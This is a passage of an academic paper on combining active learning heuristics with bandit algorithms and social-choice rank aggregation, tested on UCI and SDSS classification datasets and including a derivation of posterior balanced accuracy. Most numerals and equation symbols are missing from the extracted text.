r ∈ r do rank all the candidates in u with k. end aggregate all the rankings into one ranking using the aggregator c. select the highest-ranked candidate x� from u. ask the expert to label x�. call the label y�. add the newly labeled example to the training set: lt lt [fðx�; y�Þg. remove the newly labeled example from the unlabeled set: u unfx�g. retrain the classifier h(x) using ℒt. until we have enough training examples. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we end this section with a small illustration of how the three aggregation algorithms work in table . experimental protocol we use classification datasets taken from the uci machine learning repository (https://archive.ics.uci.edu/ml/) (lichman, ), with a large multiclass classification dataset which we extracted from the sdss project (doi . /zenodo. ) (alam et al., ). the code for the experiments can be found on our github repository (https://github.com/chengsoonong/mclass-sky). table shows the size and the number of classes in each dataset, along with the proportion of the samples belonging to the majority class and the maximum achievable performance using logistic regression. these datasets were chosen such that we have an equal number of binary and multiclass datasets, and a mixture of small and large datasets. for each dataset, we use scikit-learn (pedregosa et al., ) to train a logistic regression model using a -fold stratified shuffled cross-validation. here “stratified” means that the proportion of the classes remains constant in each split. we standardize all features to have zero mean and unit variance. although all examples have already been labeled, table an example of how social choice theory algorithms rank candidates by aggregating three heuristics: r , r , and r . there are four candidates in the unlabeled pool: a, b, c, and d. (a) an example of how the three heuristics rank four candidates a, b, c, and d. for instance, heuristic r considers b to be the highest rank candidate, followed by a, c, and d. heuristic ranking r b a c d r a c b d r b d c a (b) aggregated ranking with borda count and geometric mean. the scores are determined by the relative ranking in each heuristic. for example, a is ranked second by r , first by r , and last by r , thus giving us a score of , , and , respectively. in both methods, candidate b receives the highest aggregated score. candidate borda count geometric mean a + + = � � = b + + = � � = c + + = � � = d + + = � � = (c) aggregated ranking with the schulze method. the table shows the strongest path strength p(xi, xj) between all pairs of candidates. for example, p(b, d) = because the path b / d is the strongest path from b to d, where three heuristics prefer b over d. candidate b is the winner since p(b, a) > p(a, b), p(b, c) > p(c, b), and p(b, d) > p(d, b). from/to a b c d a – b – c – d – tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://archive.ics.uci.edu/ml/ https://dx.doi.org/ . /zenodo. https://github.com/chengsoonong/mclass-sky http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we simulate the active learning task by assuming that certain examples do not have any labels. for each fold, the unlabeled pool size is % of data up to a maximum of , examples, and the test pool consists of the remaining examples up to a maximum of , . we assume all test examples are labeled. we initialize the classifier by labeling random instances and using them as the initial training set. the heuristics are fast enough such that we can assign a score to every unlabeled instance at every time step. we use logistic regression with a gaussian kernel approximation and an l regularizer. in the binary case, the loss function is l ¼ θtθþc xn i¼ ln þ expð�yiðθtf ðxiÞÞÞ � ( ) where xi is the feature vector of the ith example, yi ∈ { , } is the label of xi, and n is the training size. the term θtθ is the regularization term to ensure that the weight vector θ is not too large, and c is a regularization hyperparameter in [ - , ] which we find using grid search. to speed up the training time while using the gaussian kernel, we approximate the feature map of the kernel with random kitchen sinks (rahimi & recht, ), transforming the raw features xi into a fixed -dimensional feature vector f (xi). in the multiclass case, we use the one-vs-rest strategy, where for every class we build a binary classifier that determines whether a particular example belongs to that class or not. for the qbb algorithms, we train a committee of seven classifiers, where each member is given a sample of maximum examples that have already been labeled. for the bandit algorithms, we use the increase in the mpba on the test set as the reward. the mpba can be thought of as the expected value of the average recall, where table overview of datasets. dataset size no. of classes no. of features majority class (%) max performance (mpba) (%) glass ionosphere iris magic , miniboone , pageblock , pima sdss , , sonar vehicle wine wpbc note: the following datasets are from the uci machine learning repository: glass, ionosphere, iris, magic, miniboone, pageblock, pima, sonar, vehicle, wine, and wpbc. in particular, the vehicle dataset comes from the turing institute, glasgow, scotland. the sdss dataset was extracted from data release of sdss-iii. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we treat the recall as a random variable that follows a beta distribution. compared to the raw accuracy score, this metric takes into account class imbalance. this is because we first calculate the recall in each class and then take the average, thus giving each class an equal weight. refer to appendix a for the derivation of the mpba, which extends brodersen et al. ( )’s formula from the binary to the multiclass setting. in total, we test query strategies. this includes passive learning, eight active learning heuristics, five bandit algorithms, and three aggregation methods. the bandit algorithms include the four described in “combining suggestions with bandit theory” and a baseline called explore which simply selects a random heuristic at each time step. in other words, we ignore the rewards and explore % of the time. for all bandit and rank aggregation methods, we take advice from six representative experts: passive, confidence, margin, entropy, qbb-margin, and qbb-kl. we have not explored how adding the heuristics with information density weighting to the bandits would impact the performance. see table for a list of abbreviations associated with the methods. given that there are datasets, each with learning curves, we need a measure that can summarize in one number how well a particular heuristic or policy does. building on baram, el-yaniv & luz ( )’s deficiency measure, we define the strength of an active learner or a combiner relative to passive learning as strengthðh; mÞ¼ � pn t¼ mðmaxÞ�mðh; tÞð Þpn t¼ mðmaxÞ�mðpassive; tÞð Þ ( ) where m is a chosen metric (e.g., accuracy rate, mpba), m(max) is the best possible performance , and m(h, t) is the performance achieved using the first t examples selected by table summary of active learning heuristics and combiners used in the experiments. abbreviation type description passive heuristic passive learning confidence heuristic least confidence heuristic w-confidence heuristic least confidence heuristic with information density weighting margin heuristic smallest margin heuristic w-margin heuristic smallest margin heuristic with information density weighting entropy heuristic highest entropy heuristic w-entropy heuristic highest entropy heuristic with information density weighting qbb-margin heuristic smallest qbb margin heuristic qbb-kl heuristic largest qbb kl-divergence heuristic explore bandit bandit algorithm with % exploration thompson bandit thompson sampling ocucb bandit optimally confidence ucb algorithm klucb bandit kl-ucb algorithm exp ++ bandit exp ++ algorithm borda aggregation aggregation with borda count geometric aggregation aggregation with the geometric mean schulze aggregation aggregation with the schulze method the best possible performance in each trial is obtained by the higher of: ( ) the performance achieved by using all the labeled examples in the training set; and ( ) the maximum value of the learning curves of all the methods. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ heuristic h. we can think of the summation as the area between the best possible performance line and the learning curve of h. the better the heuristic is, the faster it would approach this maximum line, and thus the smaller the area. finally, so that we can compare the performance across datasets, we normalize the measure with the area obtained from using just passive learning. refer to fig. for a visualization of the strength measure. we evaluate the algorithm performance with two metrics: the accuracy score and the mpba. the accuracy score is the percentage of instances in the test set where the predicted label matches the true label. if a dataset has a dominant class, then the accuracy score of instances within that class will also dominate the overall accuracy score. the mpba, on the other hand, puts an equal weight on each class and thus favors algorithms that can predict the label of all classes equally well. the heuristics with information density weighting and thompson sampling have a few additional hyperparameters. to investigate the effect of these hyperparameters, we pick one binary dataset (glass) and one multiclass dataset (ionosphere) to investigate. both of these are small enough to allow us to iterate through many hyperparameter values quickly. with w-confidence, w-margin, and w-entropy, we set g in the gaussian kernel to be the inverse of the th percentile of all pairwise distances. this appears to work well, as shown in fig. . for thompson, the prior values for m, s and the value of t seem to have little effect on the final performance (see fig. ). we set the initial m to . , the initial s to . , and t to . . results figures and show the strengths of all methods that we consider, while figs. and provide selected learning curves. plots for the six small datasets with fewer than figure an illustration of the mpba strength measure. it is proportional to the shaded area between the (red) passive learning curve and the (blue) active learning curve. the bigger the area is, the more the active learner outperforms the passive learner. the top dotted line indicates the maximum performance achieved. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ examples (glass, ionosphere, iris, sonar, wine, and wpbc) are shown in figs. and . plots for the two medium-sized datasets (pima and vehicle) and the four large datasets (magic, miniboone, pageblocks, and sdss) are shown in figs. and . each figure contains two subfigures, one reporting the raw accuracy score, while the other showing the mpba score. active learning methods generally beat passive learning in four of the six small datasets— glass, ionosphere, iris, and wine. this can be seen by the fact that the boxplots are mostly above the zero line in fig. . for sonar and wpbc, the results are mixed—active learning has little to no effect here. the wpbc dataset is particularly noisy—our classifier cannot achieve an mpba score greater than % (see fig. ). thus it is not surprising that active learning does not perform well here since there is not much to learn to begin with. the advantage of active learning becomes more apparent with the larger datasets like magic, miniboone, pageblocks, and sdss. here there is a visible gap between the figure effect of g on w-confidence and w-margin using the glass and ionosphere datasets. we examine six different values for g: the th, th, th, th, th, and th percentile of the pairwise l -distance between the data points. for the glass dataset (a), changing value of g has minimal effect on the results, while for the ionosphere dataset (b), using the th percentile and above seems to work well. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ passive learning curve and the active learning curve for most methods. for instance, using a simple heuristic such as confidence in the pageblocks dataset results in an average mpba score of % after , examples, while passive learning can only achieves % (see fig. f). out of the eight active learning heuristics tested, the heuristics with the information density weighting (w-confidence, w-margin, and w-entropy) generally perform worse than the ones without the weighting. qbb-kl performs the best in pageblocks while it can barely beat passive learning in other datasets. the remaining heuristics—confidence, margin, entropy, and qbb-margin—perform equally well in all datasets. we find no difference in performance between the bandit algorithms and the rank aggregation methods. combining active learners does not seem to hurt the performance, even if we include a poorly performing heuristic such as qbb-kl. for bandit algorithms, it is interesting to note that thompson favors certain heuristics a lot more than others, while the behavior of exp ++, ocucb, and klucb is almost figure effect of the initial values of the parameters in thompson. we test combinations of m, s , and t on the glass (a) and ionosphere (b) dataset. varying these values does not seem to affect the final performance. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure boxplots of the accuracy and mpba strength of the active learning strategies, relative to passive learning, using the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). the more positive the strength is, the better the heuristic/combiner is. gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. a strategy that is above the zero line is better than passive learning. each boxplot contains trials. the accuracy score (a, c, e, g, i, and k) is a simple metric that simply counts up the number of correct predictions. the mpba score (b, d, f, h, j, and l), being the weighted average of the recall and precision, gives an equal representation to each class. the boxes represent the quartiles and the whiskers extend to . times of the interquartile range. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure boxplots of the accuracy and mpba strength of the active learning strategies, relative to passive learning, using medium to the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). the more positive the strength is, the better the heuristic/combiner is. gray boxes represent individual heuristics; blue boxes represent bandit algorithms, and red boxes are for rank aggregation methods. a strategy that is above the zero line is better than passive learning. each boxplot contains trials. the accuracy score (a, c, e, g, i, and k) is a simple metric that simply counts up the number of correct predictions. the mpba score (b, d, f, h, j, and l), being the weighted average of the recall and precision, gives an equal representation to each class. the boxes represent the quartiles and the whiskers extend to . times of the interquartile range. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selected accuracy and mpba learning curves for the small datasets (glass, ionosphere, iris, sonar, wine, and wpbc). as it would get too cluttered to plot learning curves, we only show the accuracy (a, c, e, g, i, and k) and mpba (b, d, f, h, j, and l) learning curves for passive, confidence, exp ++, and borda. the learning curves are averaged over trials. the dotted horizontal line shows the performance obtained from using the whole training data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selected accuracy and mpba learning curves for the medium to large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). as it would get too cluttered to plot learning curves, we only show the accuracy (a, c, e, g, i, and k) and mpba (b, d, f, h, j, and k) learning curve for passive, confidence, exp ++, and borda. the learning curves are averaged over trials. the dotted horizontal line shows the performance obtained from using the whole training data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure selection frequencies of heuristics in thompson and exp ++, with the large datasets (magic, miniboone, pageblocks, pima, sdss, and vehicle). the plots show how often each of the heuristics gets selected over time. the selection frequencies are averaged over trials. thompson (a–f) favors certain heuristics more strongly than others. in contrast, exp ++ (g–l) favors uniform exploration more, sampling each heuristic with roughly equal weights. the plots for ocucb and klucb are not shown here, but they are similar to exp ++. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure the effect of the initial values of the parameters in thompson on the heuristic selection frequencies. we test combinations of m, s , and t on the glass and ionosphere dataset. which heuristics thompson picks seems to correlate with the heuristic performance. for example, in ionosphere, passive (the dotted purple line) and qbb-kl (the dashed dark blue line) tend to get picked less often than others. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ indistinguishable from explore, where we explore % of the time (see fig. ). changing the initial values of m, s , and t changes the order of preference slightly, but overall, which heuristics thompson picks seems to correlate with the heuristic performance. for example, as shown in fig. , passive and qbb-kl tend to get chosen less often than others in the ionosphere dataset. discussion the experimental results allow us to answer the following questions: . can active learning beat passive learning? yes, active learning can perform much better than passive learning, especially when the unlabeled pool is large (e.g., sdss, miniboone, pageblock). when the unlabeled pool is small, the effect of active learning becomes less apparent, as there are now fewer candidates to choose from. this can be seen in fig. , where we show that artificially reducing the unlabeled pool results in a reduction in the final performance. at the same time, having a small test set also makes the gap between the active learning curve and the passive learning curve smaller (see figs. c and f). this further contributes to the poorer performance on the smaller datasets. in any case, when a dataset is small, we can label everything so active learning is usually not needed. figure effect of the pool size on the learning curves. we pick two large datasets—pageblocks and sdss—to investigate how the size of the pool affects the performance. (a) and (d) are the original learning curves from figs. f and j (we only show the first examples so that all figures have the same scale). for (b) and (e), we use the same test pool, but the unlabeled pool now only has a maximum of candidates. finally, for (c) and (f) the combined test pool and training pool have a size of . full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . can active learning degrade performance? yes, there is no guarantee that active learning will always beat passive learning. for example, w-entropy actually slows down the learning in the many datasets. however, this only happens with certain heuristics, like those using the information density weighting. . what is the best single active learning heuristic? all of confidence, margin, entropy, and qbb-margin have a similar performance. however confidence is perhaps the simplest to compute and thus is a good default choice in practice. . what are the challenges in using bandit algorithms? (a) designing a good reward scheme is difficult. this paper uses the increase in the classifier performance as the reward. however this type of reward is non-stationary (i.e., it gets smaller after each step as learning saturates) and the rewards will thus eventually go to zero. (b) in practice, we do not have a representative test set that can be used to compute the reward. as a workaround, hsu & lin ( ) computed the reward on the training set and then used importance weighting to remove any potential bias. for this to work, we need to ensure that every training example and every active learning suggestion have a non-zero probability of being selected in each step. (c) finally, some bandit algorithms such as thompson sampling assumes that the reward follows a certain distribution (e.g., gaussian). however, this assumption is unrealistic. . what are the challenges in using rank aggregation algorithms? (a) we need to compute the scores from all heuristics at every time step. this might not be feasible if there are too many heuristics or if we include heuristics that require a large amount of compute power (e.g., variance minimization). (b) the schulze method uses o(n ) space, where n is the number of candidates. this might lead to memory issues if we need to rank a large number of candidates from the unlabeled pool. (c) before aggregating the rankings, we throw away the score magnitudes, which could cause a loss of information. (d) unlike bandit algorithms, all of the rank aggregators always give each heuristic an equal weight. . which method should i use in practice to combine active learners? since there is no difference in performance between various combiners, we recommend using a simple rank aggregator like borda count or geometric mean if we do not want to select a heuristic a priori. rank aggregators do not need a notion of a reward—we simply give all suggestions an equal weight when combining. thus we neither need to a keep a separate test set, nor do we need to worry about designing a good reward scheme. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ our investigation has a few limitations. firstly, we empirically compare algorithms that only work with single-label classification problems. nowadays, many problems require multi-label learning, in which each example is allowed to be in more than one class. our methods can be extended to work with multi-label datasets with the following modifications. we first need a multi-label classifier. this can be as simple as a collection of binary classifiers, each of which produces the probability that an example belongs to a particular class. for each class, we can use an active learning heuristic to assign a score to each unlabeled example as before. however now we need to aggregate the scores among the classes. as suggested by reyes, morell & ventura ( ), we can use any aggregation method like borda count to combine these scores. in effect, the multi-label learning problem adds an extra layer of aggregation into the pipeline. another limitation of our methods is that our active learning methods are myopic. that is, in each iteration, we only pick one instance to give to a human expert for labeling. in many practical applications like astronomy, batch-mode active learning is preferred, as it is much more cost efficient to obtain multiple labels simultaneously. one naive extension is to simply choose the m highest ranked objects using our current methods. however, it is possible to have two unlabeled objects whose class membership we are currently uncertain about, but because they have very similar feature vectors, labeling only one of them would allow us to predict the label of the other one easily. more sophisticated batch-mode active learning approaches have been proposed to take into account other factors such as the diversity of a batch and the representativeness of each batch example. these approaches include looking at the angles between hyperplanes in support vector machines (brinker, ), using cluster analysis (xu, akella & zhang, ), and using an evolutionary algorithm (reyes & ventura, ). how to aggregate suggestions from these approaches is an interesting problem for future work. conclusion in this paper we compared active learning methods with passive learning. our three main findings are: active learning is better than passive learning; combining active learners does not in general degrade the performance; and social choice theory provides more practical algorithms than bandit theory since we do not need to design a reward scheme. appendix a: posterior balanced accuracy most real-world datasets are unbalanced. in the sdss dataset, for example, there are . times as many galaxies as quasars. the problem of class imbalance is even more severe in the pageblocks dataset, where one class makes up % of the data and the remaining four classes only make up %. an easy fix is to under sample the dominant class when creating the training and test sets. this, of course, means that the size of these sets are limited by the size of the minority class. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ when we do not want to alter the underlying class distribution or when larger training and test sets are desired, we need a performance measure that can correct for the class imbalance. brodersen et al. ( ) show that the posterior balanced accuracy distribution can overcome the bias in the binary case. we now extend this idea to the multi-class setting. suppose we have k classes. for each class i between and k, there are ni objects in the universe. given a classifier, we can predict the label of every object and compare our prediction with the true label. let gi be the number of objects in class i that are correctly predicted. then we define the recall ai of class i as ai ¼ gi ni ( ) the problem is that it is not feasible to get the actual values of gi and ni since that would require us to obtain the true label of every object in the universe. thus we need a method to estimate these quantities when we only have a sample. initially we have no information about gi and ni, so we can assume that each ai follows a uniform prior distribution between and . this is the same as a beta distribution with shape parameters a = b = : ai � betað ; Þ ( ) the probability density function (pdf) of ai is then faiðaÞ¼ �ðaþbÞ �ðaÞ�ðbÞ a a� ð �aÞb� / a � ð �aÞ � ( ) where c(a) is the gamma function. after we have trained the classifier, suppose we have a test set containing ni objects in class i. running the classifier on this test set is the same as conducting k binomial experiments, where, in the ith experiment, the sample size is ni and the probability of success is simply ai. let gi be the number of correctly labeled objects belonging to class i in the test set. then, conditional on the recall rate ai, gi follows a binomial distribution: ðgi jaiÞ� binðni; aiÞ ( ) the probability mass function of ðgi jai ¼ aÞ is thus pgi jaiðgiÞ¼ ni gi � � agið �aÞni�gi / agið �aÞni�gi ( ) in the bayesian setting, eq. ( ) is the prior and eq. ( ) is the likelihood. to get the posterior pdf, we simply multiply the prior with the likelihood: fai jgðaÞ/ faiðaÞ� fgi jaiðgiÞ / a � ð �aÞ � �agið �aÞni�gi ¼ a þgi� ð �aÞ þni�gi� ( ) tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thus, with respect to the binomial likelihood function, the beta distribution is conjugate to itself. the posterior recall rate ai also follows a beta distribution, now with parameters ðai jgiÞ� betað þ gi; þni � giÞ ( ) our goal is to have a balanced accuracy rate, a, that puts an equal weight in each class. one way to achieve this is to take the average of the individual recalls: a ¼ k xk i¼ ai ¼ k at ( ) here we have defined at to be the sum of the individual recalls. we call ða jgÞ the posterior balanced accuracy, where g = (g , ..., gk). most of the time, we simply want to calculate its expected value: e½a jg� ¼ k e½at jg� ¼ k z a fat jgðaÞda ( ) let us call this the mpba. note that there is no closed form solution for the pdf fat jgðaÞ. however assuming that at is a sum of k independent beta random variables, fat jgðaÞcan be approximated by numerically convolving k beta distributions. the independence assumption is reasonable here, since there should be little to no correlation between the individual recall rates. for example, knowing that a classifier is really good at recognizing stars does not tell us much about how well that classifier can recognize galaxies. having the knowledge of fa|g (a) will allow us to make violin plots, construct confidence intervals and do hypothesis tests. to get an expression for this, let us first rewrite the cumulative distribution function as fa jgðaÞ¼ pða � a jgÞ ¼ p k at � a jg � � ¼ pðat � ka jgÞ ¼ pfat jgðkaÞ ( ) differentiating (eq. ( )) with respect to a, we obtain the pdf of (a|g): fa jgðaÞ¼ @ @a fa jgðkaÞ ¼ @ @a ðkaÞ @ @ka fat jgðkaÞ ¼ k fat jgðkaÞ ( ) a python implementation for the posterior balanced accuracy can be found on our github repository (https://github.com/chengsoonong/mclass-sky). tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/chengsoonong/mclass-sky http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the research was supported by the data to decisions cooperative research centre whose activities are funded by the australian commonwealth government’s cooperative research centres programme. this research was supported by the australian research council centre of excellence for all-sky astrophysics (caastro), through project number ce . the sdss dataset was extracted from data release of sdss-iii. funding for sdss-iii has been provided by the alfred p. sloan foundation, the participating institutions, the national science foundation, and the u.s. department of energy office of science. the sdss-iii web site is http://www.sdss .org/. sdss-iii is managed by the astrophysical research consortium for the participating institutions of the sdss-iii collaboration including the university of arizona, the brazilian participation group, brookhaven national laboratory, carnegie mellon university, university of florida, the french participation group, the german participation group, harvard university, the instituto de astrofisica de canarias, the michigan state/notre dame/jina participation group, johns hopkins university, lawrence berkeley national laboratory, max planck institute for astrophysics, max planck institute for extraterrestrial physics, new mexico state university, new york university, ohio state university, pennsylvania state university, university of portsmouth, princeton university, the spanish participation group, university of tokyo, university of utah, vanderbilt university, university of virginia, university of washington, and yale university. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: australian commonwealth government’s cooperative research centers programme. australian research council centre of excellence for all-sky astrophysics (caastro): ce . competing interests the authors declare that they have no competing interests. author contributions � alasdair tran conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. � cheng soon ong conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. � christian wolf authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the code of the experiments can be found at https://github.com/chengsoonong/mclass-sky. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.sdss .org/ https://github.com/chengsoonong/mclass-sky http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references alam s, albareti fd, prieto ca, anders f, anderson sf, andrews bh, armengaud e, aubourg é, bailey s, bautista je, beaton rl, beers tc, bender cf, berlind aa, beutler f, bhardwaj v, bird jc, bizyaev d, blake ch, blanton mr, blomqvist m, bochanski jj, bolton as, bovy j, bradley as, brandt wn, brauer de, brinkmann j, brown pj, brownstein jr, burden a, burtin e, busca ng, cai z, capozzi d, rosell ac, carrera r, chen y, chiappini c, chojnowski sd, chuang c, clerc n, comparat j, covey k, croft rac, cuesta aj, cunha k, da costa ln, rio nd, davenport jra, dawson ks, lee nd, delubac t, deshpande r, dutra-ferreira l, dwelly t, ealet a, ebelke gl, edmondson em, eisenstein dj, escoffier s, esposito m, fan x, fernández-alvar e, feuillet d, ak nf, finley h, finoguenov a, flaherty k, fleming sw, font-ribera a, foster j, frinchaboy pm, galbraith-frew jg, garcı́a-hernández da, pérez aeg, gaulme p, ge j, génova-santos r, ghezzi l, gillespie ba, girardi l, goddard d, gontcho sga, hernández jig, grebel ek, grieb jn, grieves n, gunn je, guo h, harding p, hasselquist s, hawley sl, hayden m, hearty fr, ho s, hogg dw, holley-bockelmann k, holtzman ja, honscheid k, huehnerhoff j, jiang l, johnson ja, kinemuchi k, kirkby d, kitaura f, klaene ma, kneib j, koenig xp, lam cr, lan t, lang d, laurent p, goff jl, leauthaud a, lee k, lee ys, licquia tc, liu j, long dc, lópez-corredoira m, lorenzo-oliveira d, lucatello s, lundgren b, lupton rh, mack ce iii, mahadevan s, maia mag, majewski sr, malanushenko e, malanushenko v, manchado a, manera m, mao q, maraston c, marchwinski rc, margala d, martell sl, martig m, masters kl, mcbride ck, mcgehee pm, mcgreer id, mcmahon rg, ménard b, menzel m, merloni a, mészáros s, miller aa, miralda-escudé j, miyatake h, montero-dorta ad, more s, morice-atkinson x, morrison hl, muna d, myers ad, newman ja, neyrinck m, nguyen dc, nichol rc, nidever dl, noterdaeme p, nuza se, o’connell je, o’connell rw, o’connell r, ogando rlc, olmstead md, oravetz ae, oravetz dj, osumi k, owen r, padgett dl, padmanabhan n, paegert m, palanque-delabrouille n, pan k, parejko jk, park c, pâris i, pattarakijwanich p, pellejero- ibanez m, pepper j, percival wj, pérez-fournon i, pérez-ràfols i, petitjean p, pieri mm, pinsonneault mh, de mello gfp, prada f, prakash a, price-whelan am, raddick mj, rahman m, reid ba, rich j, rix h, robin ac, rockosi cm, rodrigues ts, rodrı́guez-rottes s, roe na, ross aj, ross np, rossi g, ruan jj, rubiño-martı́n ja, rykoff es, salazar-albornoz s, salvato m, samushia l, sánchez ag, santiago b, sayres c, schiavon rp, schlegel dj, schmidt sj, schneider dp, schultheis m, schwope ad, scóccola cg, sellgren k, seo h, shane n, shen y, shetrone m, shu y, sivarani t, skrutskie mf, slosar a, smith vv, sobreira f, stassun kg, steinmetz m, strauss ma, streblyanska a, swanson mec, tan jc, tayar j, terrien rc, thakar ar, thomas d, thompson ba, tinker jl, tojeiro r, troup nw, vargas- magaña m, vazquez ja, verde l, viel m, vogt np, wake da, wang j, weaver ba, weinberg dh, weiner bj, white m, wilson jc, wisniewski jp, wood-vasey wm, yèche c, york dg, zakamska nl, zamora o, zasowski g, zehavi i, zhao g, zheng z, zhou x, zhou z, zhu g, zou h. . the eleventh and twelfth data releases of the sloan digital sky survey: final data from sdss-iii. the astrophysical journal supplement series : . audibert j-y, munos r, szepesvári c. . exploration–exploitation tradeoff using variance estimates in multi-armed bandits. theoretical computer science ( ): – doi . /j.tcs. . . . auer p, cesa-bianchi n, fischer p. a. finite-time analysis of the multiarmed bandit problem. machine learning ( – ): – . auer p, cesa-bianchi n, freund y, schapire re. b. the nonstochastic multiarmed bandit problem. siam journal on computing ( ): – doi . /s . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.tcs. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ baram y, el-yaniv r, luz k. . online choice of active learning algorithms. journal of machine learning research : – . bedö j, ong cs. . multivariate spearman’s ρ for aggregating ranks using copulas. journal of machine learning research ( ): – . berry da, fristedt b. . bandit problems: sequential allocation of experiments (monographs on statistics and applied probability). vol. . london: chapman and hall, – . breiman l, friedman j, stone cj, olshen ra. . classification and regression trees. boca raton: crc press. brinker k. . incorporating diversity in active learning with support vector machines. in: proceedings of the twentieth international conference on international conference on machine learning, icml’ . palo alto: aaai press, – . brodersen kh, ong cs, stephan ke, buhmann jm. . the balanced accuracy and its posterior distribution. in: proceedings of the th international conference on pattern recognition, icpr ‘ . washington, d.c.: ieee computer society, – . cappé o, garivier a, maillard o-a, munos r, stoltz g. . kullback-leibler upper confidence bounds for optimal sequential allocation. annals of statistics ( ): – doi . / -aos . culotta a, mccallum a. . reducing labeling effort for structured prediction tasks. in: proceedings of the th national conference on artificial intelligence–volume , aaai’ . palo alto: aaai press, – . freund y, schapire re. . experiments with a new boosting algorithm. in: proceedings of the thirteenth international conference on international conference on machine learning, icml’ . san francisco: morgan kaufmann publishers inc., – . freund y, seung hs, shamir e, tishby n. . selective sampling using the query by committee algorithm. machine learning ( – ): – . hsu w-n, lin h-t. . active learning by learning. in: aaai. palo alto: aaai press, – . lattimore t. . optimally confident ucb: improved regret for finite-armed bandits. corr. available at http://arxiv.org/abs/ . . lewis dd, gale wa. . a sequential algorithm for training text classifiers. in: proceedings of the th annual international acm sigir conference on research and development in information retrieval. new york: springer-verlag, – . lichman m. . uci machine learning repository. available at http://archive.ics.uci.edu/ml. list c. social choice theory. available at https://plato.stanford.edu/entries/social-choice/. mccallum a, nigam k. . employing em and pool-based active learning for text classification. in: proceedings of the fifteenth international conference on machine learning, icml ‘ . san francisco: morgan kaufmann publishers inc., – . melville p, mooney rj. . diverse ensembles for active learning. in: proceedings of the twenty- first international conference on machine learning. new york: acm, . pedregosa f, varoquaux g, gramfort a, michel v, thirion b, grisel o, blondel m, prettenhofer p, weiss r, dubourg v, vanderplas j, passos a, cournapeau d, brucher m, perrot m, duchesnay e. . scikit-learn: machine learning in python. journal of machine learning research : – . rahimi a, recht b. . random features for large-scale kernel machines. advances in neural information processing systems. usa: curran associates inc., – . tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / -aos http://arxiv.org/abs/ . http://archive.ics.uci.edu/ml https://plato.stanford.edu/entries/social-choice/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reichart r, tomanek k, hahn u, rappoport a. . multi-task active learning for linguistic annotations. in: proceedings of acl- : hlt. stroudsburg: association for computational linguistics, – . reyes o, morell c, ventura s. . effective active learning strategy for multi-label learning. neurocomputing : – doi . /j.neucom. . . . reyes o, ventura s. . evolutionary strategy to perform batch-mode active learning on multi- label data. acm transactions on intelligent systems and technology ( ): : : doi . / . scheffer t, 